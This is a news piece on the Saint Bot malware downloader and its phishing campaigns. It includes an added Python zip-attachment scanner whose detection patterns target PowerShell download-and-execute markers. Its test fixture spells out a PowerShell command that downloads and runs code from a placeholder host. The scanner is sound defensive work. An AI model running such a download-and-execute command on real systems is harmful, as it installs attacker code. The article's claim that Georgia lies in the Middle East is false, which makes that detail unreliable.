Researchers have spotted a new malware downloader, Saint Bot, that drops information stealers on compromised systems but is capable of delivering any malware.
Over recent weeks, researchers at Malwarebytes have been tracking the Saint Bot dropper in targeted campaigns against government institutions in Georgia, the country in the Middle East. They suspect that several different threat actors are using the new downloader.
Attackers used Saint Bot to deliver information stealers and other malware, according to the security firm. One of the information stealers it dropped was Taurus, which steals passwords, browser history, auto-fill form data, and cookies. Taurus can also harvest certain FTP and email client credentials, along with system configuration details and a list of installed software.
Malwarebytes researchers note that Saint Bot is designed to deliver any malware to a compromised system. The malware is usually distributed via spam and phishing emails, malicious websites, and infected apps. Most downloaders can evade detection, disable security tools on an infected machine, execute malicious commands, and connect to C2 servers.
Malwarebytes researchers spotted Saint Bot while investigating a phishing email carrying an unknown malware. The attached zip file hid a PowerShell script disguised as a link to a Bitcoin wallet. After a chain of code executions, the script eventually dropped Saint Bot on the compromised computer.
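As an added defender-side example (not code from the article or from Malwarebytes), the check below triages a zip attachment the way a mail gateway might catch the lure described above: it flags entries with script extensions, double extensions, wallet-themed names, or PowerShell download-and-run markers in their content. The fixture it scans is constructed here; the entry name and the one-line script are assumptions, not the actual sample.

```python
import io
import re
import zipfile

# Extensions a mail gateway should treat as executable script content.
SCRIPT_EXTENSIONS = {".ps1", ".psm1", ".vbs", ".js", ".jse", ".bat", ".cmd", ".hta", ".lnk"}
# Markers of PowerShell download-and-run content, whatever the file is named.
POWERSHELL_MARKERS = re.compile(
    r"invoke-expression|\biex\b|downloadstring|downloadfile|-encodedcommand|frombase64string",
    re.IGNORECASE)
# Lure words matching the wallet-themed filename described in the article.
LURE_WORDS = ("bitcoin", "wallet", "btc")

def inspect_archive(zip_bytes: bytes) -> list:
    """Return one finding (entry name plus reasons) per suspicious zip entry."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename.lower()
            parts = name.rsplit("/", 1)[-1].split(".")
            ext = "." + parts[-1] if len(parts) > 1 else ""
            reasons = []
            if ext in SCRIPT_EXTENSIONS:
                reasons.append("script extension " + ext)
            if len(parts) > 2:
                reasons.append("double extension")
            if any(word in name for word in LURE_WORDS):
                reasons.append("financial lure in filename")
            # Read only the head of the entry so a huge member cannot exhaust memory.
            with zf.open(info) as fh:
                head = fh.read(64 * 1024).decode("utf-8", errors="ignore")
            if POWERSHELL_MARKERS.search(head):
                reasons.append("PowerShell download/execute markers in content")
            if reasons:
                findings.append({"entry": info.filename, "reasons": reasons})
    return findings

def build_sample_attachment() -> bytes:
    """Constructed fixture (assumed, not the real sample): a zip with a wallet-named .ps1."""
    script = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("bitcoin_wallet_link.txt.ps1", script)  # the lure entry
        zf.writestr("readme.txt", "See attached.\n")       # benign, must not be flagged
    return buf.getvalue()

if __name__ == "__main__":
    for finding in inspect_archive(build_sample_attachment()):
        print(finding["entry"], "->", "; ".join(finding["reasons"]))
```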
Saint Bot is equipped with several obfuscation and anti-analysis features and can detect virtual machines. It can also determine where a system is located and refuse to execute in certain regions; Taurus, for example, is designed not to run in CIS nations. Security researchers say this is a sign that the malware authors come from that region.
The security vendor says there are signs that the malware authors are still actively developing it.
“We are seeing new campaigns that appear to be from different customers, which would indicate that the malware author is involved in further customizing the product,” Malwarebytes researchers said.